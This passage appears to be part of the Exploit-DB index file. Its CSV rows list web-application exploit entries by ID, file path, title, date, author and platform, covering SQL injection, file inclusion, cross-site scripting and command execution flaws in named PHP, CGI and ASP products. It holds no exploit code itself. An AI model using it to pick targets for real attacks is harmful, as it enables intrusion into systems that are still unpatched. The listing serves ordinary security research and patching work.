+22044,exploits/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Inclusion",2002-11-25,frog,webapps,php, +22045,exploits/cgi/webapps/22045.txt,"Working Resources BadBlue 1.7.1 - Search Page Cross-Site Scripting",2002-11-25,"Matthew Murphy",webapps,cgi, +22047,exploits/php/webapps/22047.txt,"FreeNews 2.1 - Include Undefined Variable Command Execution",2002-11-26,frog,webapps,php, +22048,exploits/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,webapps,php, +22050,exploits/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi, +22051,exploits/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi, +22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi, +22065,exploits/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,webapps,php, +22070,exploits/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",webapps,windows, +22071,exploits/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",webapps,php, +22075,exploits/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - 'viewtopic.php' Directory Contents Browsing",2002-11-08,euronymous,webapps,php, +22076,exploits/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - 'viewtopic.php' Cross-Site Scripting",2002-11-08,euronymous,webapps,php, +22077,exploits/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",webapps,php, +22080,exploits/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",webapps,php, +22083,exploits/php/webapps/22083.txt,"Deerfield VisNetic WebSite 3.5.13.1 - Cross-Site Scripting",2002-12-12,"Ory Segal",webapps,php, +22086,exploits/php/webapps/22086.txt,"Mambo Site Server 4.0.11 - 'PHPInfo.php' Information Disclosure",2002-12-12,euronymous,webapps,php, +22087,exploits/php/webapps/22087.txt,"Mambo Site Server 4.0.11 - Full Path Disclosure",2002-12-12,euronymous,webapps,php, +22088,exploits/php/webapps/22088.txt,"MyPHPSoft MyPHPLinks 2.1.9/2.2 - SQL Injection Administration Bypassing",2002-12-14,frog,webapps,php, +22089,exploits/php/webapps/22089.txt,"PHP-Nuke 6.0 - Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",webapps,php, +22090,exploits/php/webapps/22090.txt,"PHP-Nuke 6.0 - Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",webapps,php, +22092,exploits/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal",2012-10-19,xistence,webapps,multiple, +22097,exploits/php/webapps/22097.txt,"Joomla! Component com_fss 1.9.1.1447 - SQL Injection",2012-10-19,D4NB4R,webapps,php, +22098,exploits/php/webapps/22098.txt,"Joomla! Component com_tag - 'tag' SQL Injection",2012-10-19,D4NB4R,webapps,php, +22099,exploits/php/webapps/22099.txt,"CMSQLite 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,webapps,php, +22102,exploits/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Full Path Disclosure Vulnerabilities",2002-12-16,frog,webapps,php, +22103,exploits/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,webapps,php, +22104,exploits/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 - HTML Injection",2002-12-16,"Pedram Amini",webapps,php, +22107,exploits/php/webapps/22107.txt,"SPGPartenaires 3.0.1 - 'ident.php' SQL Injection",2002-12-20,frog,webapps,php, +22108,exploits/php/webapps/22108.txt,"SPGPartenaires 3.0.1 - 'delete.php' SQL Injection",2002-12-20,frog,webapps,php, +22109,exploits/php/webapps/22109.txt,"W-Agora 4.1.6 - 'EditForm.php' Cross-Site Scripting",2002-12-22,xatr0z,webapps,php, +22111,exploits/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 - Shadow File Disclosure",2002-12-22,"Victor Pereira",webapps,cgi, +22114,exploits/php/webapps/22114.txt,"PEEL 1.0b - Remote File Inclusion",2002-12-31,frog,webapps,php, +22115,exploits/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion",2003-01-02,frog,webapps,php, +22116,exploits/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion",2003-01-02,frog,webapps,php, +22125,exploits/php/webapps/22125.txt,"OpenTopic 2.3.1 - Private Message HTML Injection",2003-01-06,frog,webapps,php, +22126,exploits/php/webapps/22126.txt,"DCP-Portal 5.0.1 - 'editor.php?Root' Remote File Inclusion",2003-01-06,frog,webapps,php, +22127,exploits/php/webapps/22127.txt,"DCP-Portal 5.0.1 - 'lib.php?Root' Remote File Inclusion",2003-01-06,frog,webapps,php, +22133,exploits/php/webapps/22133.txt,"myPHPNuke 1.8.8 - 'Default_Theme' Cross-Site Scripting",2003-01-06,Mindwarper,webapps,php, +22134,exploits/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,webapps,php, +22137,exploits/cgi/webapps/22137.txt,"FormMail-Clone - Cross-Site Scripting",2003-01-09,"Rynho Zeros Web",webapps,cgi, +22146,exploits/php/webapps/22146.txt,"YABB 1.4.1 SE - 'Reminder.php' SQL Injection",2003-01-12,"VOID.AT Security",webapps,php, +22148,exploits/php/webapps/22148.txt,"PHPPass 2 - 'AccessControl.php' SQL Injection",2003-01-13,frog,webapps,php, +22149,exploits/php/webapps/22149.txt,"W-Agora 4.1.6 - 'index.php?bn' Traversal Arbitrary File Access",2003-01-13,sonyy,webapps,php, +22150,exploits/php/webapps/22150.txt,"W-Agora 4.1.6 - 'modules.php?File' Traversal Arbitrary File Access",2003-01-13,sonyy,webapps,php, +22151,exploits/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,webapps,php, +22152,exploits/php/webapps/22152.txt,"Joomla! Component com_commedia - 'task' SQL Injection",2012-10-22,D4NB4R,webapps,php, +22153,exploits/php/webapps/22153.pl,"Joomla! Component com_kunena - 'search' SQL Injection",2012-10-22,D35m0nd142,webapps,php, +22156,exploits/php/webapps/22156.txt,"WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,webapps,php, +22157,exploits/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' SQL Injection",2012-10-22,Cumi,webapps,php, +22158,exploits/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,webapps,php, +22159,exploits/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",webapps,php, +22160,exploits/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",webapps,php, +22163,exploits/php/webapps/22163.txt,"Geeklog 1.3.7 - 'profiles.php' Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,webapps,php, +22164,exploits/php/webapps/22164.txt,"Geeklog 1.3.7 - 'users.php?uid' Cross-Site Scripting",2003-01-14,snooq,webapps,php, +22165,exploits/php/webapps/22165.txt,"Geeklog 1.3.7 - 'comment.php?cid' Cross-Site Scripting",2003-01-14,snooq,webapps,php, +22166,exploits/php/webapps/22166.txt,"Geeklog 1.3.7 - 'Homepage User' HTML Injection",2003-01-14,snooq,webapps,php, +22167,exploits/php/webapps/22167.txt,"vAuthenticate 2.8 - SQL Injection",2003-01-14,frog,webapps,php, +22168,exploits/php/webapps/22168.txt,"vSignup 2.1 - SQL Injection",2003-01-14,frog,webapps,php, +22169,exploits/cgi/webapps/22169.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (1)",2003-01-13,dodo,webapps,cgi, +22170,exploits/cgi/webapps/22170.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (2)",2003-01-13,spabam,webapps,cgi, +22175,exploits/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 - HTML Injection",2003-01-15,"Cyberarmy Application",webapps,php, +22176,exploits/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 - 'help.php' Cross-Site Scripting",2003-01-15,"Cyberarmy Application",webapps,php, +22177,exploits/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 - 'edit.php' SQL Injection",2003-01-15,"Cyberarmy Application",webapps,php, +22180,exploits/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,webapps,php, +22181,exploits/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Local File Inclusion",2012-10-23,blkhtc0rp,webapps,php, +22182,exploits/php/webapps/22182.pl,"phpBB 2.0.3 - 'privmsg.php' SQL Injection",2003-01-17,"Ulf Harnhammar",webapps,php, +22186,exploits/php/webapps/22186.txt,"MyRoom 3.5 GOLD - 'save_item.php' Arbitrary File Upload",2003-01-20,frog,webapps,php, +22279,exploits/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",webapps,php, +22192,exploits/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion",2003-01-22,spabam,webapps,php, +22195,exploits/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution",2003-01-22,MGhz,webapps,php, +22198,exploits/cgi/webapps/22198.txt,"GNU Mailman 2.1 - 'email' Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,webapps,cgi, +22199,exploits/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,webapps,cgi, +22202,exploits/php/webapps/22202.txt,"FTLS Guestbook 1.1 - Script Injection",2003-01-25,BrainRawt,webapps,php, +22204,exploits/cgi/webapps/22204.txt,"MultiHTML 1.5 - File Disclosure",2000-09-13,"Niels Heinen",webapps,cgi, +22206,exploits/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Inclusion",2003-01-30,Havenard,webapps,php, +22208,exploits/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Inclusion",2003-02-03,frog,webapps,php, +22209,exploits/php/webapps/22209.txt,"PHPMyShop 1.0 - 'compte.php' SQL Injection",2003-02-03,frog,webapps,php, +22211,exploits/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,webapps,php, +40414,exploits/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",webapps,php, +22222,exploits/php/webapps/22222.txt,"TOPO 1.41 - Full Path Disclosure",2003-02-04,"Rynho Zeros Web",webapps,php, +22227,exploits/cgi/webapps/22227.txt,"FileSeek CGI Script - Remote Command Execution",2002-04-16,"Thijs Bosschert",webapps,cgi, +22228,exploits/cgi/webapps/22228.txt,"FileSeek - CGI Script File Disclosure",2002-04-16,"Thijs Bosschert",webapps,cgi, +22241,exploits/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php, +22242,exploits/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php, +22252,exploits/php/webapps/22252.txt,"PHP-Board 1.0 - User Password Disclosure",2003-02-15,frog,webapps,php, +22253,exploits/php/webapps/22253.txt,"DotBr 0.1 - 'System.php3' Remote Command Execution",2003-02-15,frog,webapps,php, +22254,exploits/php/webapps/22254.txt,"DotBr 0.1 - 'Exec.php3' Remote Command Execution",2003-02-15,frog,webapps,php, +22256,exploits/php/webapps/22256.txt,"D-Forum 1 - 'header' Remote File Inclusion",2003-02-18,frog,webapps,php, +22257,exploits/php/webapps/22257.txt,"D-Forum 1 - 'footer' Remote File Inclusion",2003-02-18,frog,webapps,php, +22260,exploits/cgi/webapps/22260.c,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (1)",2003-02-19,bob,webapps,cgi, +22261,exploits/cgi/webapps/22261.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (2)",2003-02-19,CaMaLeoN,webapps,cgi, +22262,exploits/cgi/webapps/22262.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (3)",2003-02-19,SPAX,webapps,cgi, +22263,exploits/cgi/webapps/22263.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (4)",2003-02-19,pokleyzz,webapps,cgi, +22266,exploits/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",webapps,php, +22267,exploits/php/webapps/22267.php,"PHPBB2 - 'Page_Header.php' SQL Injection",2003-02-19,"David Zentner",webapps,php, +22268,exploits/php/webapps/22268.txt,"myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",webapps,php, +22277,exploits/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",webapps,php, +22281,exploits/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",webapps,php, +22282,exploits/php/webapps/22282.txt,"WihPhoto 0.86 dev - 'sendphoto.php' File Disclosure",2003-02-24,frog,webapps,php, +22283,exploits/php/webapps/22283.txt,"CuteNews 0.88 - 'shownews.php' Remote File Inclusion",2003-02-25,Over_G,webapps,php, +22284,exploits/php/webapps/22284.txt,"CuteNews 0.88 - 'search.php' Remote File Inclusion",2003-02-25,Over_G,webapps,php, +22285,exploits/php/webapps/22285.txt,"CuteNews 0.88 - 'comments.php' Remote File Inclusion",2003-02-25,Over_G,webapps,php, +22293,exploits/php/webapps/22293.txt,"E-theni - Remote File Inclusion Command Execution",2003-01-06,frog,webapps,php, +22295,exploits/php/webapps/22295.txt,"Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion",2003-02-27,frog,webapps,php, +22297,exploits/php/webapps/22297.pl,"Typo3 3.5 b5 - 'showpic.php' File Enumeration",2003-02-28,"Martin Eiszner",webapps,php, +22298,exploits/php/webapps/22298.txt,"Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion",2003-02-28,"Martin Eiszner",webapps,php, +22300,exploits/php/webapps/22300.txt,"WordPress Plugin Easy Webinar - Blind SQL Injection",2012-10-28,"Robert Cooper",webapps,php, +22315,exploits/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",webapps,php, +22316,exploits/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",webapps,php, +22317,exploits/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,webapps,php, +40413,exploits/php/webapps/40413.txt,"Joomla! Component com_videogallerylite 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",webapps,php,80 +22318,exploits/php/webapps/22318.txt,"Webchat 0.77 - 'Defines.php' Remote File Inclusion",2003-03-03,frog,webapps,php, +22336,exploits/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",webapps,php, +22337,exploits/cgi/webapps/22337.txt,"Wordit Logbook 098b3 - Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",webapps,cgi, +22339,exploits/php/webapps/22339.txt,"SimpleBBS 1.0.6 - 'users.php' Insecure File Permissions",2003-03-07,flur,webapps,php, +22343,exploits/php/webapps/22343.txt,"VPOPMail 0.9x - 'vpopmail.php' Remote Command Execution",2003-03-11,ERRor,webapps,php, +22347,exploits/php/webapps/22347.txt,"PHP-Nuke 5.5/6.0 AvantGo Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",webapps,php, +22348,exploits/php/webapps/22348.txt,"PHP-Nuke 5.5/6.0 News Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",webapps,php, +22349,exploits/php/webapps/22349.txt,"PHP-Nuke Splatt Forum 3.2 Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",webapps,php, +22357,exploits/asp/webapps/22357.txt,"RSA ClearTrust 4.6/4.7 - Login Page Cross-Site Scripting",2003-03-15,sir.mordred@hushmail.com,webapps,asp, +22364,exploits/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass",2003-03-17,"dong-h0un U",webapps,cgi, +22372,exploits/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",webapps,php, +22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php, +22374,exploits/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,webapps,php, +22377,exploits/cgi/webapps/22377.txt,"Kebi Academy 2001 - Input Validation",2003-03-17,"dong-h0un U",webapps,cgi, +22378,exploits/php/webapps/22378.txt,"MyABraCaDaWeb 1.0 - Full Path Disclosure",2003-03-17,"gregory Le Bras",webapps,php, +22380,exploits/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,webapps,cgi, +22382,exploits/php/webapps/22382.txt,"Mambo Site Server 4.0.10 - 'index.php' Cross-Site Scripting",2003-03-18,"Ertan Kurt",webapps,php, +22383,exploits/php/webapps/22383.txt,"Basit 1.0 Submit Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",webapps,php, +22385,exploits/php/webapps/22385.txt,"Basit 1.0 Search Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",webapps,php, +22386,exploits/php/webapps/22386.txt,"Siteframe CMS 2.2.4 - 'download.php' Information Disclosure",2003-03-19,"Ertan Kurt",webapps,php, +22387,exploits/php/webapps/22387.txt,"DCP-Portal 5.3.1 - 'calendar.php' Cross-Site Scripting",2003-03-19,"Ertan Kurt",webapps,php, +22389,exploits/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",webapps,php, +22391,exploits/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",webapps,php, +22392,exploits/php/webapps/22392.txt,"osCommerce 2.1/2.2 - Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",webapps,php, +22393,exploits/php/webapps/22393.txt,"osCommerce 2.1/2.2 - 'Checkout_Payment.php' Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",webapps,php, +22396,exploits/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,webapps,php, +22398,exploits/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,webapps,php, +22399,exploits/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-11-01,"CYBSEC Labs",webapps,php, +22403,exploits/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' SQL Injection",2012-11-01,D4NB4R,webapps,php, +22405,exploits/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,webapps,php, +22408,exploits/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,webapps,cgi, +22411,exploits/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - 'banners.php' Banner Manager Password Disclosure",2003-03-22,frog,webapps,php, +22412,exploits/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,webapps,php, +40412,exploits/php/webapps/40412.txt,"Exponent CMS 2.3.9 - Blind SQL Injection",2016-09-22,"Manuel García Cárdenas",webapps,php,80 +22413,exploits/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - 'article.php' SQL Injection",2003-03-22,frog,webapps,php, +22414,exploits/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - 'index.php' SQL Injection",2003-03-23,frog,webapps,php, +22421,exploits/php/webapps/22421.txt,"Web Chat Manager 2.0 - HTML Code Injection",2003-03-25,Over_G,webapps,php, +22422,exploits/php/webapps/22422.txt,"PHP-Nuke 6.5 Addon - 'Viewpage.php' File Disclosure",2003-03-25,"Zero-X www.lobnan.de Team",webapps,php, +22423,exploits/php/webapps/22423.txt,"PHP-Nuke 6.0/6.5 Forum Module - 'viewtopic.php' SQL Injection",2003-03-25,frog,webapps,php, +22424,exploits/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - 'viewforum.php' SQL Injection",2003-03-25,frog,webapps,php, +22427,exploits/php/webapps/22427.txt,"WordPress Plugin All Video Gallery 1.1 - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",webapps,php, +22521,exploits/php/webapps/22521.c,"XMB Forum 1.8 - 'member.php' SQL Injection",2003-04-22,zeez@bbugs.org,webapps,php, +22429,exploits/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,webapps,php, +22430,exploits/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent Cross-Site Scripting",2012-11-02,"David Sopas",webapps,php, +22431,exploits/php/webapps/22431.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",webapps,php, +22436,exploits/asp/webapps/22436.txt,"MyGuestBK - 'Add.asp' Cross-Site Scripting",2002-03-27,Over_G,webapps,asp, +22437,exploits/asp/webapps/22437.txt,"MyGuestBK - Unauthorized Admin Panel Access",2002-03-27,Over_G,webapps,asp, +22438,exploits/php/webapps/22438.txt,"PostNuke 0.72x Stats Module - Full Path Disclosure",2003-03-28,rkc,webapps,php, +22439,exploits/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Full Path Disclosure",2003-03-28,rkc,webapps,php, +43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware, +43149,exploits/aspx/webapps/43149.txt,"LanSweeper 6.0.100.75 - Cross-Site Scripting",2017-11-16,"Miguel Mendez Z",webapps,aspx, +22443,exploits/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,webapps,php, +22444,exploits/php/webapps/22444.txt,"Justice Guestbook 1.3 - Full Path Disclosure",2003-03-29,euronymous,webapps,php, +22445,exploits/php/webapps/22445.txt,"ScozBook 1.1 - Full Path Disclosure",2003-03-29,euronymous,webapps,php, +22451,exploits/php/webapps/22451.txt,"Phorum 3.4 - Email Subject Line Script Injection",2003-04-02,peter,webapps,php, +22457,exploits/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 - 'index.php' File Disclosure",2003-04-03,"Albert Puigsech Galicia",webapps,php, +22459,exploits/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 - 'index.php' LNG File Disclosure",2003-04-04,"Albert Puigsech Galicia",webapps,php, +22461,exploits/php/webapps/22461.txt,"Invision Board 1.1.1 - 'functions.php' SQL Injection",2003-04-05,"Gossi The Dog",webapps,php, +22463,exploits/php/webapps/22463.txt,"WordPress Plugin Spider Catalog 1.1 - HTML Code Injection / Cross-Site Scripting",2012-11-04,D4NB4R,webapps,php, +22473,exploits/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",webapps,php, +22474,exploits/php/webapps/22474.txt,"Py-Membres 4.0 - SQL Injection",2003-04-07,frog,webapps,php, +22477,exploits/php/webapps/22477.txt,"PHPay 2.2 - Multiple Full Path Disclosure Vulnerabilities",2003-04-09,"Ahmet Sabri ALPER",webapps,php, +22478,exploits/php/webapps/22478.txt,"PHPay 2.2 - Cross-Site Scripting",2003-04-09,"Ahmet Sabri ALPER",webapps,php, +22481,exploits/cgi/webapps/22481.txt,"Super Guestbook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,webapps,cgi, +22482,exploits/cgi/webapps/22482.txt,"Guestbook 4.0 - Sensitive Information Disclosure",2003-04-10,Over_G,webapps,cgi, +22484,exploits/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,webapps,asp, +22486,exploits/cfm/webapps/22486.txt,"InstaBoard 1.3 - 'index.cfm' SQL Injection",2003-04-14,"Jim Dew",webapps,cfm, +22487,exploits/asp/webapps/22487.txt,"Web Wiz Site News 3.6 - Information Disclosure",2003-04-14,drG4njubas,webapps,asp, +22490,exploits/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,webapps,multiple, +22491,exploits/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",webapps,php, +22501,exploits/php/webapps/22501.txt,"Xonic.ru News 1.0 - 'script.php' Remote Command Execution",2003-03-31,"DWC Gr0up",webapps,php, +22492,exploits/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Full Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",webapps,php, +22493,exploits/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall - Multiple Vulnerabilities",2012-11-05,Procheckup,webapps,hardware, +22498,exploits/php/webapps/22498.txt,"osCommerce 2.2 - Authentication Bypass",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22499,exploits/cgi/webapps/22499.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)",2003-04-15,"Nick Cleaton",webapps,cgi, +22500,exploits/cgi/webapps/22500.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)",2003-05-05,snooq,webapps,cgi, +22507,exploits/asp/webapps/22507.txt,"Web Wiz Forum 6.34 - Information Disclosure",2003-04-17,"Uziel aka nuJIurpuM",webapps,asp, +22513,exploits/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,webapps,asp, +22517,exploits/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",webapps,php, +22519,exploits/php/webapps/22519.txt,"OpenBB 1.0/1.1 - 'board.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",webapps,php, +22520,exploits/php/webapps/22520.txt,"OpenBB 1.0/1.1 - 'member.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",webapps,php, +22571,exploits/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Command Execution",2003-05-07,"Revin Aldi",webapps,cgi, +22524,exploits/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,webapps,php, +22529,exploits/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection",2003-04-23,Du|L,webapps,asp, +22534,exploits/php/webapps/22534.txt,"Truegalerie 1.0 - Unauthorized Administrative Access",2003-04-25,frog,webapps,php, +22539,exploits/php/webapps/22539.txt,"Xoops 1.3.x/2.0 MyTextSanitizer - HTML Injection",2003-04-25,magistrat,webapps,php, +22543,exploits/php/webapps/22543.txt,"Onecenter Forum 4.0 - IMG Tag Script Injection",2003-04-25,"David F. Madrid",webapps,php, +22544,exploits/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure",2003-04-26,"Network Intelligence",webapps,cfm, +22545,exploits/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution",2003-04-26,aresu@bosen.net,webapps,cgi, +22547,exploits/php/webapps/22547.php,"Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass",2012-11-07,webDEViL,webapps,php, +22548,exploits/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,webapps,php, +22549,exploits/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server - Directory Traversal",2012-11-07,"Patrick Saladino",webapps,hardware, +22554,exploits/asp/webapps/22554.txt,"Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection",2003-04-30,"Cesar Cerrudo",webapps,asp, +22555,exploits/asp/webapps/22555.txt,"Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection",2003-04-30,"Cesar Cerrudo",webapps,asp, +22557,exploits/php/webapps/22557.txt,"PHP-Nuke Splatt Forum 4.0 Module - Cross-Site Scripting",2003-05-01,"Morning Wood",webapps,php, +22558,exploits/php/webapps/22558.txt,"PHP-Nuke Splatt Forum 4.0 Module - HTML Injection",2003-05-01,"Morning Wood",webapps,php, 